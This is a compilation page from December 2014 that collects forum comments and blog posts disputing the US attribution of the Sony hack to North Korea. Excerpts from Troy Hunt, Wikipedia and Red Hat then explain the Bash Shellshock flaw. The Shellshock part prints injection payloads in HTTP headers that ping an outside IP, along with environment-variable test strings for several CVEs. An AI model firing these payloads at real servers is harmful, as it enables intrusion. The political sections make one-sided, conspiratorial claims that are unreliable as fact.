Because the world is just full of people who would hack a company to blackmail them not to release a movie about Kim Jong Un. Because everyone loves the Great Leader! His family's personality cult^H^H^H^H^H^H^H^H^H^H^H^H^H^H^H^HVoluntary Praise Actions only take up about 1/3rd of the North Korean budget. And I mean, they totally deserve it. I mean, did you know that his father was the world's greatest golf player who never had to defecate and whose birth was fortold by a swallow and heralded by a new star in the sky?

No, of course it wasn't North Korea. Clearly it was the work of America! Because America wants nothing more than a conflict with North Korea right now. Because clearly Russia and Syria and ISIS aren't enough, no, the US obviously has nothing better to do than to try to stir up things out of the blue with the Hollywood obsessed leader of a cult state whose family has gone so far as to kidnap filmmakers and force them to make movies for him. It all just makes so damn much sense!

Cue the conspiracy theorists in three, two, one...

Anonymous Coward on Wednesday December 24, 2014 @06:26PM (#48670085)

Shakey evidence hasn't stopped the US government (Score:2, Insightful)

Removing the government, destabilising the region and killing hundreds of thousands of civilians based solely on circumstantial evidence isn't exactly new to the US government, i'm sure they don't really care who was truly responsible.

arth1 (260657) on Wednesday December 24, 2014 @07:45PM (#48670469) Homepage Journal

Re: Shakey evidence hasn't stopped the US governme (Score:4, Interesting)

There is, however, possibly the world's largest repositories of rare earth metals [wikipedia.org].

dltaylor (7510) on Wednesday December 24, 2014 @06:29PM (#48670097)

not really likely (Score:5, Interesting)

NK denied it, rather than taking credit.

Their tools are widely distributed, so faking the source is really easy.

The US government is weird combination of ineptitude and self-aggrandizement, so the FBI claims are likely pure BS designed to make the claimants look good (they were SOOO sure that had profiled the Yosemite killer years ago that it only took two more deaths to prove them wrong).

Greyfox (87712) on Wednesday December 24, 2014 @06:29PM (#48670099) Homepage Journal

To What End? (Score:2)

So what's the motive then? Plain ol' extortion, or are they trying to distract the media from the CIA torture story that came out about the same time? If it's the latter, it did a good job -- the media and public seem to have the attention span of a two-year-old.

MichaelSmith (789609) on Wednesday December 24, 2014 @06:38PM (#48670151) Homepage Journal

Re:To What End? (Score:5, Informative)

The same article over at boing boing suggested that a sacked ex employee had released the files.

Okian Warrior (537106) on Wednesday December 24, 2014 @06:39PM (#48670153) Homepage Journal

Wait - what? (Score:5, Insightful)

The FBI points to reused code from previous attacks associated with North Korea [...]

Um... I hate to be the non-technical person that points this out, but...

The evidence that implicates NK on the previous attacks - is it the same evidence used to assign blame in the current attack?

Is this citing the conclusions based on the same evidence/situation from previous attacks to give legitimacy to the evidence in the current attack?

What a scam! Claim something on flimsy evidence, then cite those claims to give legitimacy to the flimsy evidence!

I wonder... can I do this sort of thing in the scientific literature? Hmmmm...

jd.schmidt (919212) on Wednesday December 24, 2014 @07:29PM (#48670401)

If NK did it, explain this one.. (Score:5, Informative)

So I hear it was an inside job, how did NK get a spy infiltrated into Sony so quickly? Does NK really have that many spy assets all over the U.S. that they can whistle up as needed? Or was this an elaborate operation set up when the movie was first announced and they managed to infiltrate a NK citizen into Sony pictures in the time it took the make the movie? How does this all actually go down? FYI, NK is pretty computer illiterate over all compared to most countries and nearly every country on the planet is better positioned than NK to pull this stunt off along with a whole bunch of independent yahoos.

Unless there is U.S. born traitor working for NK, seems that the possible suspects could be narrowed down pretty quickly. I am NOT saying NK was framed, but I AM saying there are a lot a people out there to do stuff for reasons I wouldn't and more real data is needed.

kencurry (471519) on Wednesday December 24, 2014 @07:46PM (#48670481)

So much wrong here (Score:5, Insightful)

1) No concrete evidence that a Sovereign County hacked into Sony, but POTS says he thinks they did anyways

2) Movie is probably total piece of sh*t anyways, who cares?

3) Even if NK did it, it is not an attack on US but a foreign corp with some US holding, but still a Japanese company, why don't they saber rattle instead of us?

4) The whole thing could have been PR stunt from Sony to advertise the movie

5) Why didn't POTS just tell Sony "get your sh*t together, improve your security - tired of this crap, dayum!"

Eternal Vigilance (573501) on Wednesday December 24, 2014 @08:00PM (#48670543)

The NK story was cover to protect Sony (and NSA) (Score:5, Insightful)

Of course North Korea didn't attack Sony. Asking "Did North Korea really attack Sony?" is like asking "Does NORAD really track Santa?"

The North Korea story was spin to save Sony from the devastating bad publicity about the depths of their business and technological incompetence. (The politicians who defended them will get repaid for this favor during the next election cycle. My previous comment about this from last week: They may even start using this to try to rescue that disaster of a movie. "You have to see 'The Interview'! To support free speech and America!" [slashdot.org])

The Dear Leader Of The Free World announcing "don't blame poor Sony, they were helpless victims of the evil North Koreans" totally changed the media story, saving Sony huge $$$ in both public perception and future lawsuits.

But just how America's President and trillion-dollar national security state could get things so wrong - but should always be trusted when saying who's bad and deserves to be killed, like some kind of psycho-Santa delivering death from his sleigh filled with drones - will never be questioned.

Businesses and politicians will never stop lying when it works this well.

Merry Christmas.

fremsley471 (792813) on Wednesday December 24, 2014 @06:56PM (#48670245)

Re:Occam's Razor (Score:5, Insightful)

No, Occam's Razor said the simplest answer is most likely true. The OP didn't go on a flight of fantasy, you did. Nation state hacks corporation with possible major diplomatic consequences over a B-movie? Pull the other one, it's got WMDs on it.

arth1 (260657) on Wednesday December 24, 2014 @07:03PM (#48670287) Homepage Journal

Re:Occam's Razor (Score:5, Insightful)

I do not think you know what Occam's razor is. It does not mean you need conclusive evidence to believe in something. It means the simplest explanation tends to be the best one, other things being equal.

Actually, that's not what it says. It says that plurality is not to be posited without necessity, i.e. don't add complexity to reach a conclusion if it can be reached without adding it.

The simplest solution here isn't that it's North Korea acting based on an unreleased movie they probably hadn't even heard of before this whole debacle, displaying hacking skills not seen before, and then denying it.

Much simpler solutions could be disgruntled former employees or someone doing it for the lulz. It's not like Sony hasn't been a magnet for the latter, with all the previous hacks.

In any case, unless the three letter agencies are withholding crucial information, there's not enough to go on here to point the fingers at Kim Jong-Un. I'm sure there are people who would blame him no matter what, because frankly he's an asshole of Goatse dimensions, but the evidence needs to be far more solid than this.

rwa2 (4391) * on Wednesday December 24, 2014 @08:22PM (#48670617) Homepage Journal

Re:Occam's Razor - PR stunt (Score:3)

Yeah, I'm with you here. I'm sure it's more likely that this is a PR stunt gone wild and we all fell for it. Even the POTUS fell for it. Before this, I hadn't even heard of the studio, much less the movie.

Let's see...

suckers :P

abirdman (557790) * <abirdman&maine,rr,com> on Wednesday December 24, 2014 @09:18PM (#48670795) Homepage Journal

Re:Occam's Razor - PR stunt (Score:2)

Also, there have been no reviews of the film, either positive or negative. For a movie that looked as bad as the one shown in the previews I saw, this could what saves the box office. I can see no possible advantage for NK to invest the resources into hacking Sony over a second-rate comic movie. Who would get an advantage from the Sony hack? I'll bet a lot of Symantec licenses will be renewed before the end of the year. Sorry, just free-associating here. If I had mod points you'd get an insightful.

smaddox (928261) on Wednesday December 24, 2014 @07:51PM (#48670503)

Re: Occam's Razor (Score:2)

Your objections are easily explained away as a false flag operation initiated by an individual or group.

jrumney (197329) on Wednesday December 24, 2014 @09:34PM (#48670883) Homepage

Re:Occam's Razor (Score:2)

In order to say CIA hacked Sony, you would have to invent all sorts of motives and cover-up to explain it. The simpler explanation is that N. Korea did it, because the circumstances and evidence so far all point to it.

You mean the motives and cover-up the media has so far invented all point to it. An even simpler explanation is that disgruntled hacker groups reused some attack code, perhaps from an attack on South Korean companies a few weeks back which maybe North Korea paid them to deploy.

The narrative about The Interview being motivation for the attack didn't come out until long after the attacks, and was initially denied by the contacts the media had made, and only a few days later that statements from the supposed hackers started mentioning it. This was likely after disgruntled hackers realized that it made a better back story than the fact that they were just being assholes, and would likely deflect law enforcement attention away from them if it became widely believed

[Dec 24, 2014]  Sony Hack - Likely Inside Attacker Found - Obama Claim Discredited

"...It follows the pattern. In 2002, when the U.S. broke the Geneva agreement which froze the North Korean nuclear program, the US accused North Korea of secretly engaging in u1ranium enrichment."
"...The whole purpose of the demonization in the MSM of North Korea is to justify the Asian pivot, which is actually about containment of China. The establishment believes it best to not tell the "useful idiots" in the general population so they're using North Korea so as to "protect" the clueless public."
"...P2Asia promised 60:40% realignment to Pacific Theater, from current 40;60%, but (in writing) without Atlantic Theater reduction in forces. No base closures. No redeployments. Pure Mil.Gov Stage 5 Metastasis, from 40:60% to 90:60% as it were, the greatest expansion since to Cold War, and Ukraine:Syria was just an Atlanticist chess move to ensure this will be massive. The only thing the US produces today is bad cars, and military and financial weapons of mass destruction. The Cheneyites will ensure the P2Asia $100sBs all get looted away on IDIQNB contracts. The Gang of Eight 40,000,000 'Blue Visa' Immigration Service Class Bill actually stated in the legislation 'No Bid', together with a New Federal Secret Police, and Rendition SuperMax Prisons in evert State. Together with McHealthcare, McEducatiin, McWar and McPrisons"
"..."Cui bono? Who benefits from framing North Korea?" The same people who will benefit or who did benefit from framing Serbia, Russia, Syria, Iran, or Libya ? Just a guess."
Moon of Alabama

The U.S. claims, with zero reliable evidence, that Sony was hacked by North Korea. The NYT editors believed that Weapon of Mass Destruction claim and called for action against North Korea. MoA, like others, seriously doubted the story the Obama regime told:

The tools to hack the company are well known and in the public domain. The company, Sony, had lousy internal network security and had been hacked before. The hackers probably had some inside knowledge. They used servers in Bolivia, China and South Korea to infiltrate. There is zero public evidence in the known that the hack was state sponsored.

Later "explanation" of the "evidence" by the FBI was unconvincing. Now a serious security company claims to have identified the real hacker:

Kurt Stammberger, a senior vice president with cybersecurity firm Norse, told CBS News his company has data that doubts some of the FBI's findings.

"Sony was not just hacked, this is a company that was essentially nuked from the inside," said Stammberger.
...
"We are very confident that this was not an attack master-minded by North Korea and that insiders were key to the implementation of one of the most devastating attacks in history," said Stammberger.

He says Norse data is pointing towards a woman who calls herself "Lena" and claims to be connected with the so-called "Guardians of Peace" hacking group. Norse believes it's identified this woman as someone who worked at Sony in Los Angeles for ten years until leaving the company this past May.

"This woman was in precisely the right position and had the deep technical background she would need to locate the specific servers that were compromised," Stammberger told me.

The piece also points out that the original demand by the hackers was for money and had nothing to do with an unfunny Sony movie that depicts the murder of the head of a nation state.

Attributing cyber-attacks, if possible at all, is a difficult process which usually ends with uncertain conclusions. Without further evidence it will often be wrong.

That a person has now be identified with the insider knowledge and possibly motive for the hack and without any connection to North Korea makes the Obama administration's claim of North Korean "guilt" even less reliable.

It now seems likely that Obama, to start a conflict with North Korea, just lied about the "evidence" like the Bush administration lied about "Saddam's WMD". The NYT editors were, in both cases, childishly gullible or complicit in the crime. 

Puppet Master | Dec 24, 2014 3:43:16 AM | 1

It follows the pattern. In 2002, when the U.S. broke the Geneva agreement which froze the North Korean nuclear program, the US accused North Korea of secretly engaging in uranium enrichment.

It turned out that the intelligence the US had about it was less than certain.

http://www.nytimes.com/2007/03/01/washington/01korea.html?pagewanted=print&_r=0

March 1, 2007
U.S. Had Doubts on North Korean Uranium Drive

The public revelation of the intelligence agencies’ doubts, which have been brewing for some time, came almost by happenstance. In a little-noticed exchange on Tuesday at a hearing at the Senate Armed Services Committee, Joseph DeTrani, a longtime intelligence official, told Senator Jack Reed of Rhode Island that “we still have confidence that the program is in existence — at the mid-confidence level.” Under the intelligence agencies’ own definitions, that level “means the information is interpreted in various ways, we have alternative views” or it is not fully corroborated.

Too late. North Korea already did her first nuclear weapon test in 2006.

All the lies and ploy are to force North Korea into developing Nuclear weapon, and it was exactly what necons wanted.

http://www.washingtonpost.com/wp-dyn/content/article/2006/10/21/AR2006102100296.html

At many points, the United States found itself at odds with other partners in the six-party process, such as China and South Korea, which repeatedly urged the Bush administration to show more flexibility in its tactics. Meanwhile, administration officials were often divided on North Korea policy, with some wanting to engage the country and others wanting to isolate it.

Before North Korea announced it had detonated a nuclear device, some senior officials even said they were quietly rooting for a test, believing that would finally clarify the debate within the administration.

Why do they do that?
Not about North Korea, but to catch China.

North Korea is just a trap the US has been carefully preparing for a long time to catch China, by maintaining a crisis spot on Chinese border, and keeping South Korea and Japan in the US orbit and away from China.

For the US, North Korea plays the same geopolitical role as Ukraine. As Ukraine is a geopolitical wedge between Russia and Europe, North Korea is the geopolitical wedge between China and Japan.

One good thing now is that their ploy is becoming more transparent and unraveling more quickly.

P Walker | Dec 24, 2014 10:16:59 AM | 8

The whole purpose of the demonization in the MSM of North Korea is to justify the Asian pivot, which is actually about containment of China. The establishment believes it best to not tell the "useful idiots" in the general population so they're using North Korea so as to "protect" the clueless public.

Chip Nihk | Dec 24, 2014 6:34:03 PM | 10

It goes a little deeper.

P2Asia promised 60:40% realignment to Pacific Theater, from current 40;60%, but (in writing) without Atlantic Theater reduction in forces. No base closures. No redeployments. Pure Mil.Gov Stage 5 Metastasis, from 40:60% to 90:60% as it were, the greatest expansion since to Cold War, and Ukraine:Syria was just an Atlanticist chess move to ensure this will be massive. The only thing the US produces today is bad cars, and military and financial weapons of mass destruction. The Cheneyites will ensure the P2Asia $100sBs all get looted away on IDIQNB contracts. The Gang of Eight 40,000,000 'Blue Visa' Immigration Service Class Bill actually stated in the legislation 'No Bid', together with a New Federal Secret Police, and Rendition SuperMax Prisons in evert State. Together with McHealthcare, McEducatiin, McWar and McPrisons

nomas | Dec 24, 2014 7:36:18 PM | 11

Obama along with the rest of the U.S. executive and State apparatus, are , by all the evidence, pathological liars

nomas | Dec 24, 2014 7:46:28 PM | 14

@ anon @ 4

"Cui bono? Who benefits from framing North Korea?"

The same people who will benefit or who did benefit from framing Serbia, Russia, Syria, Iran, or Libya ? Just a guess.

[Nov 02, 2014] Russian Hackers Are Fiendishly Smart. Good Thing For America They’re So Stupid

Talleyrand used to say "A married man with a family will do anything for money". This is especially true about some security company employees...
Oct 29, 2014 | http://marknesop.wordpress.com

Anyway, before we range too far afield to find our way back, let’s look at the Wall Street Journal article. Just keep in the back of your mind that the “experts” who say the trail leads straight back to the Russian government might well be a couple of college dropouts who spend the rest of their time playing World Of Warcraft.

Security wizards FireEye, a cybersecurity firm based in California, discovered “a sophisticated cyberweapon, able to evade detection and hop between computers walled off from the Internet” in a U.S. system. This brilliant piece of sleuthware, we further learn, “was programmed on Russian-language machines and built during working hours in Moscow.”

Stupid, stupid Russians. They went to all the trouble to bore and stroke that baby until it was humming with super-secret code power, and then pointed a trail right back to the Rodina by writing their code in Cyrillic. And, moreover, betrayed themselves even more convincingly by writing all this code during working hours in Moscow. Or Aman, Jordan, which shares the same time. Or Baghdad. Or Damascus, or Dar es Salaam. Djibouti. Nairobi. Simferopol. Or perhaps the code was written by somebody outside working hours. Is there some evidence that compelled investigators to think the work of writing spy code has to be done between the hours of 9:00 AM and 5:00 PM?

Their confidential report is due to be released Tuesday, so I guess we’ll have to wait to find out. Oh, wait – no, we won’t, because they told the Wall Street Journal (the world’s biggest fucking blabbermouths), and they posted a link to it. They’re calling this mysterious group “APT-28″. Because “Dirty Moskali Masterminded By Putin”, while it looked great on the cover, cost more to print – and we all have to think about costs these days – and sort of lacked the techno-wallop they were looking for.

I don’t want to spoil the report for you, because it is a ripping read, but I have to say up front that a lot of the circumstantial evidence which causes FireEye to blame this snooping on Russia is summed up in an assessment by one of their managers – a former Russia analyst for the U.S. Department of Defense, by a wonderful coincidence: ” “Who else benefits from this? It just looks so much like something that comes from Russia that we can’t avoid the conclusion.

I see. Well, by God, that is evidence, no denying that. It just looks like Russia. Probably because they were stupid enough to code in Cyrillic, even though almost everyone codes in English regardless where they’re from because almost all programming languages are in English, because most popular frameworks and third-party extension are written in English, because Cyrillic characters are not allowed when naming many functions and variables, and….gee, I’m sure there was something else….oh, yeah: and because using Cyrillic would be a dead giveaway that the source was Russian, and it would be indescribably stupid to write a brilliant code that it would take a top-notch security hired gun to find, and then leave the root code in Cyrillic. The article is at pains to imply the Russians are the world’s most clever hackers. Sure hope they don’t find out how stupid it is to write their code in Russian, or they might really start achieving some success.

But this sneaky program was written during working hours in Moscow, and the information it sought to exploit would only be of interest to the Russian government; that’s how FireEye broke the whole thing wide open, and they’ve been onto the Russians for seven years, ever since they prefaced their invasion of Georgia with a cyber-attack on Georgia’s systems, and ultimately made Saakashvili eat his tie.

Hey, I can think of somebody else who is interested in as much information as it can get on U.S. governmental inner workings, policymaking and current financial situation. Israel. And what do you know? Jerusalem is only an hour off of Moscow time. I’m not suggesting it must have been Israel instead of Russia – perish the thought. But I hope I have adequately expressed my contempt for the doughheaded theory that it must have been Moscow because sneaky writers of dirty code adhere to regular office hours. Just sayin’.

Incidentally, the United States Foreign Agent Registration Act (FARA) has never been enforced against Israel, and in 2012 an amendment was introduced which (paraphrased) reads “The Attorney General may, by regulation, provide for the exemption..[if the AG] determines that such registration…is not necessary…”

After all, Israel has a long and colourful history of spying on the United States. In the early 80’s the FBI investigated AIPAC for long-running espionage and theft of government documents relating to the United States – Israel Free Trade Pact: because Israel had a purloined copy of the USA’s negotiating positions, the story goes, the USA was unable to exploit anything to its advantage because the Israelis already knew what the Americans would concede under pressure: “A quarter-century after the tainted negotiations led to passage of the US-Israel preferential trade pact, it remains the most unfavourable of all U.S. bilateral trade agreements, producing chronic deficits, lack of U.S. market access to Israel and ongoing theft of U.S. intellectual property.

Defense department stuff? Sure, they were interested in that, too. In 2005 Larry Franklin, Steven Rosen and Keith Weissman were indicted in Virginia for passing classified documents to a foreign power (Israel, although they danced around who it was by referring to it as simply “a Middle Eastern Country”) which were tremendously useful to Israel in its attempts to maneuver the USA into war with Iran on its behalf. Franklin plead guilty and received a 12-year prison sentence which was later – incredibly – reduced to 100 hours of community service and 10 months in a halfway house. All charges against Rosen and Weissman, lobbyists for AIPAC, were dropped in 2009. The United States government claimed it did not want classified material revealed at trial. So dangerous, not to put too fine a point on it, that it was better to let the criminals who had given that classified information to a foreign power go free without punishment than to risk Americans learning it who had no need to know.

Nor was that the only instance. Johnathan Pollard, an analyst with U.S. Naval Intelligence Command, was convicted of spying for Israel and sentenced to life imprisonment. That sentence has waffled back and forth, largely due to intense efforts by agencies of the Israeli government to get it commuted, and currently stands at release just about a year from now. Israel acknowledged that Pollard had spied for that country on its ally in a formal apology, and the Victim Impact Statement hints that the information which was passed endangered both American lives and the USA’s relations with its Arab allies. Details were never made public, and remain classified. However, as the referenced article points out, Israel today enjoys real-time intelligence sharing with the USA, so I guess spying on America is not really all that important after all – what’s FireEye ki-yiing about?

U.S. Navy submariner Ariel Weinmann was arrested and detained as a spy for Israel in 2006 when he reportedly deserted from his unit (USS ALBUQUERQUE) taking with him a laptop computer which held classified information. He was believed to have met with an agent of a foreign power in Vienna and in Mexico City. Initial reports said that power was Israel. Later, after the allies had time to get their heads together and agree on a cover story, Time Magazine broke a story which put it out there, with no substantiation whatsoever, that the foreign power implicated had actually been – wait for it – Russia. He probably had just become confused because Jerusalem and Moscow have almost the same working hours. Weinmann is apparently not Jewish, by the way, the name is of German extraction, or so his father says. He was alleged, by his father, to have been upset because of the USA collecting intelligence information on its allies. So, if you’re still following the storyline, Weinmann – after a naval deployment to the Persian Gulf where the Navy upset him by collecting intelligence information on its allies – stole a laptop containing classified information which presumably proved his case, and disclosed that information to…Russia. Uh huh. A nation which is not only not an ally of the United States – pretty damned far from it, in fact – but one which has no serious naval profile in the Persian Gulf. I feel kind of like I’m running on a giant pretzel.

More recently, in May of this year, Newsweek announced despairingly that Israel will not stop spying on the USA, and the USA will not make them stop. In this article, which accuses Israel of constantly maneuvering to steal American technology and industrial secrets, Israel’s espionage activities are described as “unrivaled and unseemly”. Comically, Israeli Embassy spokesman Aaron Sagui retorted angrily, “Israel doesn’t conduct espionage operations in the United States, period. We condemn the fact that such outrageous, false allegations are being directed against Israel.” No word on whether his nose immediately grew so rapidly that it put the reporter’s eye out, because Israel has already admitted to and apologized for espionage activities in the United States before.

Which brings us back to FireEye, speaking of Pinocchio. FireEye, frankly, needs a big break. Its stock is sinking as other Threat Detection commercial security companies muscle in on the market, and in May was down 65% from a 52-week high, while investors were getting impatient to see some success.

A success like this one, in fact.

Let’s go back a minute to the giddy summary by the FireEye executive cited earlier. “Who else benefits from this? It just looks so much like something that comes from Russia that we can’t avoid the conclusion.

You know why the conclusion is unavoidable? Because the malicious code is specifically engineered to point in that direction. Who would do that? Russians who meant it to be undetectable?

You tell me.

[Oct 03, 2014] Everything you need to know about the Shellshock Bash bug

September 25, 2014 | troyhunt.com
Remember Heartbleed? If you believe the hype today, Shellshock is in that league and with an equally awesome name albeit bereft of a cool logo (someone in the marketing department of these vulns needs to get on that). But in all seriousness, it does have the potential to be a biggie and as I did with Heartbleed, I wanted to put together something definitive both for me to get to grips with the situation and for others to dissect the hype from the true underlying risk.

To set the scene, let me share some content from Robert Graham’s blog post who has been doing some excellent analysis on this. Imagine an HTTP request like this:

target = 0.0.0.0/0
port = 80
banners = true
http-user-agent = shellshock-scan (http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html)
http-header = Cookie:() { :; }; ping -c 3 209.126.230.74
http-header = Host:() { :; }; ping -c 3 209.126.230.74
http-header = Referer:() { :; }; ping -c 3 209.126.230.74

Which, when issued against a range of vulnerable IP addresses, results in this:

[Oct 03, 2014] Shellshock (software bug)

en.wikipedia.org

Analysis of the source code history of Bash shows that the vulnerabilities had existed undiscovered since approximately version 1.13 in 1992.[4] The maintainers of the Bash source code have difficulty pinpointing the time of introduction due to the lack of comprehensive [1]

In Unix-based operating systems, and in other operating systems that Bash supports, each running program has its own list of name/value pairs called environment variables. When one program starts another program, it provides an initial list of environment variables for the new program.[14] Separately from these, Bash also maintains an internal list of functions, which are named scripts that can be executed from within the program.[15] Since Bash operates both as a command interpreter and as a command, it is possible to execute Bash from within itself. When this happens, the original instance can export environment variables and function definitions into the new instance.[16] Function definitions are exported by encoding them within the environment variable list as variables whose values begin with parentheses ("()") followed by a function definition. The new instance of Bash, upon starting, scans its environment variable list for values in this format and converts them back into internal functions. It performs this conversion by creating a fragment of code from the value and executing it, thereby creating the function "on-the-fly", but affected versions do not verify that the fragment is a valid function definition.[17] Therefore, given the opportunity to execute Bash with a chosen value in its environment variable list, an attacker can execute arbitrary commands or exploit other bugs that may exist in Bash's command interpreter.

The name "shellshock" is attributed[by whom?][not in citation given] to Andreas Lindh from a tweet on 24 September 2014.non-primary source needed]

On October 1st, Zalewski released details of the final bugs, and confirmed that Florian's patch does indeed prevent them. Zalewski says fixed

CGI-based web server attack

When a web server uses the Common Gateway Interface (CGI) to handle a document request, it passes various details of the request to a handler program in the environment variable list. For example, the variable HTTP_USER_AGENT has a value that, in normal usage, identifies the program sending the request. If the request handler is a Bash script, or if it executes one for example using the system(3) call, Bash will receive the environment variables passed by the server and will process them as described above. This provides a means for an attacker to trigger the Shellshock vulnerability with a specially crafted server request.[4] The security documentation for the widely used Apache web server states: "CGI scripts can ... be extremely dangerous if they are not carefully checked."[20] and other methods of handling web server requests are often used. There are a number of online services which attempt to test the vulnerability against web servers exposed to the Internet.[citation needed]

SSH server example

OpenSSH has a "ForceCommand" feature, where a fixed command is executed when the user logs in, instead of just running an unrestricted command shell. The fixed command is executed even if the user specified that another command should be run; in that case the original command is put into the environment variable "SSH_ORIGINAL_COMMAND". When the forced command is run in a Bash shell (if the user's shell is set to Bash), the Bash shell will parse the SSH_ORIGINAL_COMMAND environment variable on start-up, and run the commands embedded in it. The user has used their restricted shell access to gain unrestricted shell access, using the Shellshock bug.[21]

DHCP example

Some DHCP clients can also pass commands to Bash; a vulnerable system could be attacked when connecting to an open Wi-Fi network. A DHCP client typically requests and gets an IP address from a DHCP server, but it can also be provided a series of additional options. A malicious DHCP server could provide, in one of these options, a string crafted to execute code on a vulnerable workstation or laptop.[9]

Note of offline system vulnerability

The bug can potentially affect machines that are not directly connected to the Internet when performing offline processing, which involves the use of Bash.[citation needed]

Initial report (CVE-2014-6271)

This original form of the vulnerability involves a specially crafted environment variable containing an exported function definition, followed by arbitrary commands. Bash incorrectly executes the trailing commands when it imports the function.[22] The vulnerability can be tested with the following command:

env x='() { :;}; echo vulnerable' bash -c "echo this is a test"

In systems affected by the vulnerability, the above commands will display the word "vulnerable" as a result of Bash executing the command "echo vulnerable", which was embedded into the specially crafted environment variable named "x".[24]

There was an initial report of the bug made to the maintainers of Bash (Report# CVE-2014-6271). The bug was corrected with a patch to the program. However, after the release of the patch there were subsequent reports of different, yet related vulnerabilities. On 26 September 2014, two open-source contributors, David A. Wheeler and Norihiro Tanaka, noted that there were additional issues, even after patching systems using the most recently available patches. In an email addressed to the oss-sec list and the bash bug list, Wheeler wrote: "This patch just continues the 'whack-a-mole' job of fixing parsing errors that began with the first patch. Bash's parser is certain [to] have many many many other vulnerabilities".[25]
On 27 September 2014, Michal Zalewski announced his discovery of several other Bash vulnerabilities,[26] one based upon the fact that Bash is typically compiled without [27] Zalewski also strongly encouraged all concerned to immediately apply a patch made available by Florian Weimer.[27]

CVE-2014-6277

CVE-2014-6277 relates to the parsing of function definitions in environment variables by Bash. It was discovered by Michał Zalewski.[29]

This causes a segfault.

() { x() { _; }; x() { _; } <<a; }

CVE-2014-6278

CVE-2014-6278 relates to the parsing of function definitions in environment variables by Bash. It was discovered by Michał Zalewski.[29]


() { _; } >_[$($())] { echo hi mom; id; }

CVE-2014-7169

On the same day the bug was published, Tavis Ormandy discovered a related bug which was assigned the CVE identifier CVE-2014-7169.[21] Official and distributed patches for this began releasing on 26 September 2014.[citation needed] Demonstrated in the following code:

env X='() { (a)=>\' sh -c "echo date"; cat echo

which would trigger a bug in Bash to execute the command "date" unintentionally. This would become CVE-2014-7169.[21]

Testing example

Here is an example of a system that has a patch for CVE-2014-6271 but not CVE-2014-7169:

$ X='() { (a)=>\' bash -c "echo date"
bash: X: line 1: syntax error near unexpected token `='
bash: X: line 1: `'
bash: error importing function definition for `X'
$ cat echo
Fri Sep 26 01:37:16 UTC 2014

The patched system displays the same error, notifying the user that CVE-2014-6271 has been prevented. However, the attack causes the writing of a file named 'echo', into the working directory, containing the result of the 'date' call. The existence of this issue resulted in the creation of CVE-2014-7169 and the release patches for several systems.

A system patched for both CVE-2014-6271 and CVE-2014-7169 will simply echo the word "date" and the file "echo" will not be created.

$ X='() { (a)=>\' bash -c "echo date"
date
$ cat echo
cat: echo: No such file or directory

CVE-2014-7186

CVE-2014-7186 relates to an out-of-bounds memory access error in the Bash parser code.[31] While working on patching Shellshock, Red Hat researcher Florian Weimer found this bug.[23]

Testing example

Here is an example of the vulnerability, which leverages the use of multiple "<<EOF" declarations:

bash -c 'true <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF' ||
echo "CVE-2014-7186 vulnerable, redir_stack"
A vulnerable system will echo the text "CVE-2014-7186 vulnerable, redir_stack".

CVE-2014-7187

CVE-2014-7187 relates to an off-by-one error, allowing out-of-bounds memory access, in the Bash parser code.[32] While working on patching Shellshock, Red Hat researcher Florian Weimer found this bug.[23]

Testing example

Here is an example of the vulnerability, which leverages the use of multiple "done" declarations:

(for x in {1..200} ; do echo "for x$x in ; do :"; done; for x in {1..200} ; do echo done ; done) | bash ||
echo "CVE-2014-7187 vulnerable, word_lineno"
A vulnerable system will echo the text "CVE-2014-7187 vulnerable, word_lineno".

Frequently Asked Questions about the Shellshock Bash flaws

Sep 26, 2014 | securityblog.redhat.com

Why are there four CVE assignments?

The original flaw in Bash was assigned CVE-2014-6271. Shortly after that issue went public a researcher found a similar flaw that wasn’t blocked by the first fix and this was assigned CVE-2014-7169. Later, Red Hat Product Security researcher Florian Weimer found additional problems and they were assigned CVE-2014-7186 and CVE-2014-7187. It’s possible that other issues will be found in the future and assigned a CVE designator even if they are blocked by the existing patches.

... ... ...

Why is Red Hat using a different patch then others?

Our patch addresses the CVE-2014-7169 issue in a much better way than the upstream patch, we wanted to make sure the issue was properly dealt with.
I have deployed web application filters to block CVE-2014-6271. Are these filters also effective against the subsequent flaws?

If configured properly and applied to all relevant places, the “() {” signature will work against these additional flaws.

Does SELinux help protect against this flaw?

SELinux can help reduce the impact of some of the exploits for this issue. SELinux guru Dan Walsh has written about this in depth in his blog.

Are you aware of any new ways to exploit this issue?

Within a few hours of the first issue being public (CVE-2014-6271), various exploits were seen live, they attacked the services we identified at risk in our first post:

We did not see any exploits which were targeted at servers which had the first issue fixed, but were affected by the second issue. We are currently not aware of any exploits which target bash packages which have both CVE patches applied.

Why wasn’t this flaw noticed sooner?

The flaws in Bash were in a quite obscure feature that was rarely used; it is not surprising that this code had not been given much attention. When the first flaw was discovered it was reported responsibly to vendors who worked over a period of under 2 weeks to address the issue.

This entry was posted in Vulnerabilities and tagged bash, CVE-2014-6271, CVE-2014-6277, CVE-2014-6278, CVE-2014-7169, CVE-2014-7186, CVE-2014-7187, shellshocked by Huzaifa Sidhpurwala. Bookmark the permalink.

https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/

Update 2014-09-25 16:00 UTC

Red Hat is aware that the patch for CVE-2014-6271 is incomplete. An attacker can provide specially-crafted environment variables containing arbitrary commands that will be executed on vulnerable systems under certain conditions. The new issue has been assigned CVE-2014-7169.

We are working on patches in conjunction with the upstream developers as a critical priority. For details on a workaround, please see the knowledgebase article.

Red Hat advises customers to upgrade to the version of Bash which contains the fix for CVE-2014-6271 and not wait for the patch which fixes CVE-2014-7169. CVE-2014-7169 is a less severe issue and patches for it are being worked on.


Bash or the Bourne again shell, is a UNIX like shell, which is perhaps one of the most installed utilities on any Linux system. From its creation in 1980, Bash has evolved from a simple terminal based command interpreter to many other fancy uses.

In Linux, environment variables provide a way to influence the behavior of software on the system. They typically consists of a name which has a value assigned to it. The same is true of the Bash shell. It is common for a lot of programs to run Bash shell in the background. It is often used to provide a shell to a remote user (via ssh, telnet, for example), provide a parser for CGI scripts (Apache, etc) or even provide limited command execution support (git, etc)

Coming back to the topic, the vulnerability arises from the fact that you can create environment variables with specially-crafted values before calling the Bash shell. These variables can contain code, which gets executed as soon as the shell is invoked. The name of these crafted variables does not matter, only their contents. As a result, this vulnerability is exposed in many contexts, for example:

Like “real” programming languages, Bash has functions, though in a somewhat limited implementation, and it is possible to put these Bash functions into environment variables. This flaw is triggered when extra code is added to the end of these function definitions (inside the enivronment variable). Something like:

